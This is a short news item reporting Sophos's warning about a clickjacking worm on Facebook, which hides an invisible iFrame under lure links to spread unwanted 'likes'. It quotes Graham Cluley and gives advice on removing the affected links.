Sophos, an IT security and data protection firm, has reported that Facebook is under attack by a phenomenon called “clickjacking”, which is spreading ‘like’ fire. Is it really harmful? No news on that yet, except the fact that the affected user will apparently ‘like’ some inane external links. Affected users however, have only themselves to blame. What did they do to deserve it?
Well, they visited a friend’s profile page, and clicked on one of the following ‘liked’ external links, to read more about them:
“LOL This girl gets OWNED after a POLICE OFFICER reads her STATUS MESSAGE.”
“This man takes a picture of himself EVERYDAY for 8 YEARS!!”
“This Girl Has An Interesting Way Of Eating A Banana, Check It Out!”
What happens next is the user is taken to a blank page with a “single line of text” that reads, ‘Click here to continue’. Even if the user doesn’t click right on the text, an invisible iFrame will use any click on the page to publish the very same external link onto the user’s own profile page, thereby propagating the worm. Are we wary just yet? Yup, we don’t want to be caught dead liking something as boring as a man photographing himself daily, or a girl eating suggestively shaped fruit. If you are a victim of this ‘clickjacking’ attack, don’t worry, you can simply remove the offending external links by deleting them from your news feed, and remove the offending pages from their ‘Likes and interests’ section, under the ‘Info’ tab of their profile.
Here’s what Sophos’ Senior Technology Consultant, Graham Cluley, has to say about it: “What the hackers have done is really sneaky. They hide an invisible button - using a hidden iFrame - under your mouse, so wherever you click your mouse-press is hijacked, secretly clicking on a button which tells Facebook that you 'like' the webpage. This then gets published on your own Facebook page and shared with your online friends, resulting in the link spreading virally. Some of the pages ended up with hundreds of thousands of fans as a result. Facebook needs to tighten up the way it handles the 'liking' of external webpages before it is more widely abused by malicious hackers and spammers.”